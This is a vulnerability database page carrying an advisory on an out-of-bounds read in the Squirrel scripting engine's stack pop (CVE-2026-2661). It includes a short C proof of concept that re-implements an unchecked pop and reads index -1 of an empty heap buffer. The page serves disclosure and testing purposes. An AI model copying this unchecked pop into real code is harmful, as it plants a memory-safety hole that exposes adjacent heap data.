Lucene search
K

๐Ÿ“„ Squirrel Out-Of-Bounds Read

๐Ÿ—“๏ธย 23 Feb 2026ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 117ย Views

Squirrel stack pop lacks bounds check, reads data[size-1] on empty stack, causing heap underflow.

Related
Code
ReporterTitlePublishedViews
Family
CNNVD
SQUIRREL ๅฎ‰ๅ…จๆผๆดž
18 Feb 202600:00
โ€“cnnvd
CVE
CVE-2026-2661
18 Feb 202619:02
โ€“cve
Cvelist
CVE-2026-2661 Squirrel sqobject.h operator heap-based overflow
18 Feb 202619:02
โ€“cvelist
Debian CVE
CVE-2026-2661
18 Feb 202619:02
โ€“debiancve
NVD
CVE-2026-2661
18 Feb 202620:18
โ€“nvd
OSV
CVE-2026-2661 Squirrel sqobject.h operator heap-based overflow
18 Feb 202619:02
โ€“osv
OSV
DEBIAN-CVE-2026-2661
18 Feb 202620:18
โ€“osv
OSV
UBUNTU-CVE-2026-2661
18 Feb 202620:18
โ€“osv
Positive Technologies
PT-2026-20485
18 Feb 202600:00
โ€“ptsecurity
RedhatCVE
CVE-2026-2661
19 Feb 202619:21
โ€“redhatcve
Rows per page
=============================================================================================================================================
    | # Title     : Squirrel Heap Underflow in Stack Pop Function Leading to Out-of-Bounds Read                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : http://squirrel-lang.org/                                                                                                   |
    =============================================================================================================================================
    
    [+] Summary    :  A vulnerability exists in the Squirrel engineโ€™s stack implementation due to missing bounds checking in the PopTarget function. 
                      When attempting to pop from an empty stack, the function reads from data[size - 1] (index -1), causing a heap buffer underflow.
    
    [+] This allows:
    
    Information disclosure (heap metadata or adjacent memory content)
    
    Application crashes (segmentation faults)
    
    Potential escalation if the leaked memory affects control flow
    
    [+] Vulnerability Type: Out-of-Bounds Read / Heap Underflow
    
    [+] Affected Component: Stack management in Squirrel Engine
    
    [+] Save as: poc.c
    
    [+] Translation with AddressSanitizer protection (recommended) : gcc -fsanitize=address -g poc.c -o poc
    
    [+] Run : ./poc
    
    [+] An ASAN report similar to:
    
    heap-buffer-overflow
    
    READ of size 8
    
    [+] POC   : 
    
    #include <stdio.h>
    #include <stdlib.h>
    
    typedef struct {
        long long *data;
        int size;
        int capacity;
    } TargetStack;
    
    long long PopTarget(TargetStack *stack) {
    
        long long target = stack->data[stack->size - 1]; 
        stack->size--;
        return target;
    }
    
    int main() {
    
        TargetStack stack;
        stack.capacity = 4;
        stack.size = 0; 
        stack.data = (long long *)malloc(stack.capacity * sizeof(long long));
    
        if (stack.data == NULL) return 1;
    
        printf("Starting PoC...\n");
        printf("Stack size: %d\n", stack.size);
        printf("Attempting to PopTarget from empty stack...\n");
        
        long long leaked_data = PopTarget(&stack);
        printf("Leaked data from index [-1]: %lld\n", leaked_data);
    
        free(stack.data);
        return 0;
    }
    
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Feb 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.13.3 - 7.8
CVSS 21.7
CVSS 44.8
CVSS 33.3
EPSS0.00235
SSVC
117